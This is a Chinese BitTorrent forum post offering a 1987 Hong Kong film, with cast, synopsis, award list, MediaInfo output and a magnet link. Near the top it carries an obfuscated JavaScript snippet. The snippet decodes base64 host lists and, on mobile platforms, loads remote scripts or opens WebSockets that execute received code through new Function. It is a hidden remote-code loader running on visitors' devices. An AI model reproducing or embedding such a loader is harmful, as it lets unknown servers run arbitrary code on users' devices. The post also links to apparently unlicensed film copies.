最后胜利[国语配音/粤语配音].Final.Victory.1987.1080p.BluRay.x265.10bit.DTS.2Audio 7.30GB

版主小s 1月前 186

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 最后胜利 / Final Victory
◎片  名 最後勝利
◎年  代 1987
◎产  地 中国香港
◎类  别 剧情 / 爱情 / 犯罪
◎语  言 粤语
◎上映日期 1987-03-12(中国香港)
◎IMDb链接 https://www.imdb.com/title/tt0094387/
◎豆瓣评分 7.2/10 (3396人评价)
◎豆瓣链接 https://movie.douban.com/subject/1306708/
◎片  长 98分钟
◎导  演 谭家明 Patrick Tam (id:1275088)
◎编  剧 王家卫 Kar Wai Wong (id:1041024)
       谭家明 Patrick Tam (id:1275088)
       Tsang Yu Tsang Yu (id:1301564)
◎演  员 曾志伟 Eric Tsang (id:1002862)
       李丽珍 Loletta Lee (id:1016848)
       李殿朗 Margaret Lee Din-Long (id:1318470)
       徐克 Hark Tsui (id:1007152)
       司马燕 Michelle Szema (id:1315845)
       黄雄 Hung Wong (id:1441657)
       张永雄 Paul Cheung (id:1402485)
       潘迪生 Dickson Poon (id:1294716)
       陈百强 Danny Chan Bak-Keung (id:1073785)
       钟定一 Danny Chung (id:1280781)
       林国华 Ardy Lam (id:1289296)
       蒋国权 Kwang Che Ching (id:1325550)
       谭家明 Patrick Tam (id:1275088)
       卢瑞莲 Sui Lin Lo (id:1381129)
       张永雄 Paul Cheung (id:1402485)

◎标  签 香港 / 谭家明 / 王家卫 / 徐克 / 香港电影 / 李丽珍 / 曾志伟 / 1987

◎简  介
  黑道大哥宝(徐克 饰)为人凶暴,却有一个慢性子老好人亲弟弟雄(曾志伟 饰)鞍前马后,雄连女友被人夺走这种事也要宝出面抻头。宝犯罪事发即将入狱半年,他在服刑前嘱托雄照顾好老情人萍(李殿朗 饰)和小情人咪咪(李丽珍 饰)。雄一照面就被萍给了下马威,又卷入她和高利贷团伙的纷争,两人脱身后匆匆赶赴日本寻找咪咪,发现咪咪的处境也颇为棘手,雄为帮两个大嫂脱身绞尽脑汁,另一方面又要各种欺瞒来防止她们发现彼此的身份。三人回到香港后事情终于败露,萍大哭大闹却被宝喝止,在等待宝出狱的日子里,雄与咪咪之间产生了感情,但如何去面对大哥,又成了雄无法化解的心结……                                    
                                本片获1988年香港电影金像奖最佳剪辑奖。

◎获奖情况 (共10项)
  第7届香港电影金像奖 (1988)
  最佳电影(提名)
  最佳导演(提名)
   └──谭家明 (id:1275088)
  最佳编剧(提名)
   └──王家卫 (id:1041024)
  最佳男主角(提名)
   └──曾志伟 (id:1002862)
  最佳女主角(提名)
  最佳男配角(提名)
   └──徐克 (id:1007152)
  最佳摄影(提名)
   └──林国华 (id:1289296)
  最佳剪接
   └──蒋国权 (id:1325550)
  最佳美术指导(提名)
   └──谭家明 (id:1275088)
  最佳原创电影音乐(提名)
   └──钟定一 (id:1280781)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 100287312071497928087493968551186076249 (0x4B72A23C86C64D8C916F844A87A51259)

  4. Complete name                            : [email protected]DQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 7.29 GiB

  8. Duration                                 : 1 h 38 min

  9. Overall bit rate                         : 10.6 Mb/s

  10. Encoded date                             : UTC 2021-08-24 03:55:02

  11. Writing application                      : mkvmerge v55.0.0 ('Waiting For Space') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : Main [email protected]@Main

  18. Codec ID                                 : V_MPEGH/ISO/HEVC

  19. Duration                                 : 1 h 38 min

  20. Bit rate                                 : 7 489 kb/s

  21. Width                                    : 1 920 pixels

  22. Height                                   : 1 016 pixels

  23. Display aspect ratio                     : 1.890

  24. Frame rate mode                          : Constant

  25. Frame rate                               : 23.976 (24000/1001/53354) FPS

  26. Color space                              : YUV

  27. Chroma subsampling                       : 4:2:0

  28. Bit depth                                : 10 bits

  29. Bits/(Pixel*Frame)                       : 0.160

  30. Stream size                              : 5.17 GiB (71%)

  31. Writing library                          : x265 3.4+1-g07e3381df+31:[Windows][GCC 10.1.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings                        : rc=crf / crf=18.5000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.70 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1016 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.01 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  33. Default                                  : Yes

  34. Forced                                   : No


  35. Audio #1

  36. ID                                       : 2

  37. Format                                   : DTS

  38. Format/Info                              : Digital Theater Systems

  39. Codec ID                                 : A_DTS

  40. Duration                                 : 1 h 38 min

  41. Bit rate mode                            : Constant

  42. Bit rate                                 : 1 510 kb/s

  43. Channel(s)                               : 6 channels

  44. Channel layout                           : C L R Ls Rs LFE

  45. Sampling rate                            : 48.0 kHz

  46. Frame rate                               : 93.750 FPS (512 SPF)

  47. Bit depth                                : 24 bits

  48. Compression mode                         : Lossy

  49. Stream size                              : 1.04 GiB (14%)

  50. Title                                    : Cantonese

  51. Language                                 : Chinese

  52. Default                                  : Yes

  53. Forced                                   : No


  54. Audio #2

  55. ID                                       : 3

  56. Format                                   : DTS

  57. Format/Info                              : Digital Theater Systems

  58. Codec ID                                 : A_DTS

  59. Duration                                 : 1 h 38 min

  60. Bit rate mode                            : Constant

  61. Bit rate                                 : 1 510 kb/s

  62. Channel(s)                               : 6 channels

  63. Channel layout                           : C L R Ls Rs LFE

  64. Sampling rate                            : 48.0 kHz

  65. Frame rate                               : 93.750 FPS (512 SPF)

  66. Bit depth                                : 24 bits

  67. Compression mode                         : Lossy

  68. Stream size                              : 1.04 GiB (14%)

  69. Title                                    : Mandarin

  70. Language                                 : Chinese

  71. Default                                  : No

  72. Forced                                   : No


  73. Text #1

  74. ID                                       : 4

  75. ID in the original source medium         : 4609 (0x1201)

  76. Format                                   : PGS

  77. Muxing mode                              : zlib

  78. Codec ID                                 : S_HDMV/PGS

  79. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration                                 : 1 h 37 min

  81. Bit rate                                 : 31.2 kb/s

  82. Count of elements                        : 2098

  83. Stream size                              : 21.7 MiB (0%)

  84. Title                                    : chs

  85. Language                                 : Chinese

  86. Default                                  : Yes

  87. Forced                                   : No

  88. Original source medium                   : Blu-ray


  89. Text #2

  90. ID                                       : 5

  91. ID in the original source medium         : 4608 (0x1200)

  92. Format                                   : PGS

  93. Muxing mode                              : zlib

  94. Codec ID                                 : S_HDMV/PGS

  95. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  96. Duration                                 : 1 h 37 min

  97. Bit rate                                 : 33.5 kb/s

  98. Count of elements                        : 2098

  99. Stream size                              : 23.3 MiB (0%)

  100. Title                                    : cht

  101. Language                                 : Chinese

  102. Default                                  : No

  103. Forced                                   : No

  104. Original source medium                   : Blu-ray


  105. Text #3

  106. ID                                       : 6

  107. ID in the original source medium         : 4610 (0x1202)

  108. Format                                   : PGS

  109. Muxing mode                              : zlib

  110. Codec ID                                 : S_HDMV/PGS

  111. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  112. Duration                                 : 1 h 37 min

  113. Bit rate                                 : 27.0 kb/s

  114. Count of elements                        : 2098

  115. Stream size                              : 18.7 MiB (0%)

  116. Language                                 : English

  117. Default                                  : No

  118. Forced                                   : No

  119. Original source medium                   : Blu-ray


  120. Menu

  121. 00:00:00.000                             : en:第 01 章

  122. 00:09:09.006                             : en:第 02 章

  123. 00:14:06.053                             : en:第 03 章

  124. 00:24:07.070                             : en:第 04 章

  125. 00:36:25.349                             : en:第 05 章

  126. 00:47:18.627                             : en:第 06 章

  127. 00:57:17.767                             : en:第 07 章

  128. 01:04:00.503                             : en:第 08 章

  129. 01:09:46.307                             : en:第 09 章

  130. 01:16:48.395                             : en:第 10 章

  131. 01:22:44.000                             : en:第 11 章

  132. 01:30:57.660                             : en:第 12 章



TAGS 剧情 犯罪 爱情

磁力链:
  • magnet:?xt=urn:btih:9893E469FDDBBE9434B55CE32496D3CE0B097EEB
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖